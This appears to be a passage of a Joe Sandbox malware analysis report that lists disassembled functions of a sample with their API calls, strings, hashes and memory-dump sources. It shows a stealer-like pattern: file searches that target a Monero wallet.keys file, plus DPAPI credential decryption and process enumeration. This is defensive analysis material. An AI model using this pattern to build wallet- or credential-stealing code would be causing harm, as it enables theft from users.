                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: +y$7n}v$;9S_$o?$u_k${;${;
                        • API String ID: 0-97793633
                        • Opcode ID: 09679e3f9284cae7a7339bc2ab33f2e20e921577fba10de7c22a41596d08e8a4
                        • Instruction ID: 336c2b7b644b78cae82c17c190334fa242dcb34b2a43e6aabfa157a9dd270d87
                        • Opcode Fuzzy Hash: 09679e3f9284cae7a7339bc2ab33f2e20e921577fba10de7c22a41596d08e8a4
                        • Instruction Fuzzy Hash: E2B205F3A082049FE704AE2DEC8567AFBE5EF94720F1A492DE6C4C3744E63558058797
                        Function 00C4E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C60D73), ref: 00C4E4A2
                        • StrCmpCA.SHLWAPI(?,00C614F8), ref: 00C4E4F2
                        • StrCmpCA.SHLWAPI(?,00C614FC), ref: 00C4E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: f260e38da87f5681e92c9e529911a35a8374dc8a0050add15e3be7bae2ce01a7
                        • Instruction ID: e95fd0cc15e25332236077ba4f7b9536ecefd2f039a4cc58118d8d930a9773da
                        • Opcode Fuzzy Hash: f260e38da87f5681e92c9e529911a35a8374dc8a0050add15e3be7bae2ce01a7
                        • Instruction Fuzzy Hash: D6123F759101189ADB14FB62DC96EED7338BF54301F4042A9B90AA6091FF306F8DDFA6
                        Function 01017E75 Relevance: 9.1, Strings: 6, Instructions: 1646COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 5Fc_$GtgW$Si_~$Xce$Z?$rJ+}
                        • API String ID: 0-2440060258
                        • Opcode ID: 13f24f0b4ea3ec427916652085b2d98d53d3bd9dfbdc16e1c9127b806f86cac0
                        • Instruction ID: da5eeb75e04606ff97e2e1691464ca5e3fecf13a60fa61fa45413d917ca1c3da
                        • Opcode Fuzzy Hash: 13f24f0b4ea3ec427916652085b2d98d53d3bd9dfbdc16e1c9127b806f86cac0
                        • Instruction Fuzzy Hash: 33B217F36082049FE704AE2DEC8577AF7E9EF94320F1A853DE6C4C7744EA3598058696
                        Function 010147F9 Relevance: 9.1, Strings: 6, Instructions: 1634COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Dgo$JD{$VR]$i3:O${r5$[E
                        • API String ID: 0-1220943483
                        • Opcode ID: 98780f1f767700533aed8301b644b8ff477a6aa0e3d1f402ff16c3223541ae1a
                        • Instruction ID: 3cbf1e5a4ad0dab0daf952b78566a4042f5a25dc992f765624ce48bda7ea3411
                        • Opcode Fuzzy Hash: 98780f1f767700533aed8301b644b8ff477a6aa0e3d1f402ff16c3223541ae1a
                        • Instruction Fuzzy Hash: A9B228F3A0C2109FE3046E2DEC8567ABBE9EF94720F1A493DEAC4C3344E67558058796
                        Function 0101650C Relevance: 9.0, Strings: 6, Instructions: 1479COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 6a_X$8rh$]^i$sV~W$t+jo$F7N
                        • API String ID: 0-2849425773
                        • Opcode ID: eed917dec397d9518e4703ff4021f20271f67ea3936c8942c21ae17a8f344fc4
                        • Instruction ID: 70f520e032c3f825dd988beb8db9e6ca15c3ca8a8eff9c3d870431d73dc5b981
                        • Opcode Fuzzy Hash: eed917dec397d9518e4703ff4021f20271f67ea3936c8942c21ae17a8f344fc4
                        • Instruction Fuzzy Hash: ECA216F360C2049FE3046E29EC8567ABBE9EF94720F1A493DE6C5C3344EA3598458797
                        Function 01007043 Relevance: 8.0, Strings: 5, Instructions: 1713COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: "8r$(+c<$(+c<$OS}$f~:}
                        • API String ID: 0-1059734795
                        • Opcode ID: e11eddea951735a65598c03931c82d601464addfe491b18323b00ffbf7f3fa48
                        • Instruction ID: 586dbeb0c03ffabaa83ef3320424ae6b07615b9bde971b30a2b25200bf592072
                        • Opcode Fuzzy Hash: e11eddea951735a65598c03931c82d601464addfe491b18323b00ffbf7f3fa48
                        • Instruction Fuzzy Hash: 1FB25CF3A0C2049FE3046E2DEC8567AB7E9EFD4720F1A863DEAC5C3744E93558058696
                        Function 0101CE32 Relevance: 7.9, Strings: 5, Instructions: 1610COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !SW}$R$Og$U{gG$U{gG$apy
                        • API String ID: 0-401539328
                        • Opcode ID: 13acd1692b4b92004f85b962fa0bf32a680de47f9e1d10518062bbce5178b6c1
                        • Instruction ID: ce8a8814d34c9aef90dbedee32dccb50b15ce3c4831ea753775aed073b119f60
                        • Opcode Fuzzy Hash: 13acd1692b4b92004f85b962fa0bf32a680de47f9e1d10518062bbce5178b6c1
                        • Instruction Fuzzy Hash: 51B2F6F36082049FE3046F2DEC8567AFBE9EF94720F1A493DEAC583744EA7558018697
                        Function 01019987 Relevance: 7.9, Strings: 5, Instructions: 1605COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 3A|]$R8bm$_Pu $sd~$W}}
                        • API String ID: 0-291602057
                        • Opcode ID: e767e7e7c427506f625d4ecc83b978b03f73979e1b3e0b5d6e147024f515d7e8
                        • Instruction ID: a5bcb3b4d02e9749debbc487c9c432b8a949c923ade9b68244c27368f6406711
                        • Opcode Fuzzy Hash: e767e7e7c427506f625d4ecc83b978b03f73979e1b3e0b5d6e147024f515d7e8
                        • Instruction Fuzzy Hash: 80B2F5F360C2009FE308AE29EC8567ABBE9EF94320F1A853DE6C5C7744E67558418697
                        Function 00C4C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C4C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C4C87C
                        • lstrcat.KERNEL32(?,00C60B46), ref: 00C4C943
                        • lstrcat.KERNEL32(?,00C60B47), ref: 00C4C957
                        • lstrcat.KERNEL32(?,00C60B4E), ref: 00C4C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 0735f0773497aabe0c3606542533d20d7efc4802592f0d81ea42889351dc779b
                        • Instruction ID: f61c97ba8afba0cefd2c7ebc12a9643b3e587c9c37e8584602f132622561648e
                        • Opcode Fuzzy Hash: 0735f0773497aabe0c3606542533d20d7efc4802592f0d81ea42889351dc779b
                        • Instruction Fuzzy Hash: 32415DB590421AEFDB10DF90DD89BFEB7B8BB48304F1441B9E509B6280D7745A84CF92
                        Function 00C47240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C4724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C47254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C47281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00C472A4
                        • LocalFree.KERNEL32(?), ref: 00C472AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 160acb60e10fc356e160e7625d32fcdb630ca4152b96bf54c09f67e33e501fd3
                        • Instruction ID: 69a3b71038bb173fd9bffe33a6723dc3d0367cc802e4843df37d9aae5a771db0
                        • Opcode Fuzzy Hash: 160acb60e10fc356e160e7625d32fcdb630ca4152b96bf54c09f67e33e501fd3
                        • Instruction Fuzzy Hash: 6E010CB5A40208BFEB24DFD5DD4AF9E77B8AB44B00F144555FB09BA2C0D6B0AA048B65
                        Function 00C59600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C5961E
                        • Process32First.KERNEL32(00C60ACA,00000128), ref: 00C59632
                        • Process32Next.KERNEL32(00C60ACA,00000128), ref: 00C59647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00C5965C
                        • CloseHandle.KERNEL32(00C60ACA), ref: 00C5967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: cf8a9fb95bd531f6813e58704245400b40b2262e20f565fb31b1dd8b6c0b3025
                        • Instruction ID: 9406acd591d41f6b8d0cabd64bbec648d6305d4cc983e47e9076c9752c00aafa
                        • Opcode Fuzzy Hash: cf8a9fb95bd531f6813e58704245400b40b2262e20f565fb31b1dd8b6c0b3025
                        • Instruction Fuzzy Hash: 5D012979A00208EFDB14DFA6C948BEDB7F8EB08301F144199A90AA6240DB349B88DF51
                        Function 0100FBE6 Relevance: 6.2, Strings: 4, Instructions: 1230COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: (^Y~$gr-z$i^Yo$>;
                        • API String ID: 0-3191279034
                        • Opcode ID: 45568d45ed564fd7c74f1ff25e5fcc04f0df532599e39b05c9d20e2f56f747d4
